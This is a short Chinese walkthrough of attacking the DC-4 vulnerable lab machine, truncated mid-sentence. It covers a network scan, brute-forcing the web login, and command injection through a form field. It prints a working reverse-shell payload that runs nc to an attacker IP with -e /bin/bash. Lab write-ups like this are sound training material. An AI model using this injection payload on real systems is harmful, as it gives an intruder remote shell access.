DC-4靶机渗透 扫描内网机器,看到143是开启的,那么ok了,确定了目标主机的地址. 对其进行进一步的端口扫描,80,22端口都是开放的. 访问具体网页,进行爆破,分别为admin,happy. 里面能够执行三种命令,看一下中间的包,发现命令直接进行了显示,那可以直接构造反弹shell了,当前身份是在www-data目录下 radio=nc+192.168.114.128+9090+-e+/bin/bash&submit=Run 反弹成功,利用python进入交互模式: 查找了三个用户,在ji…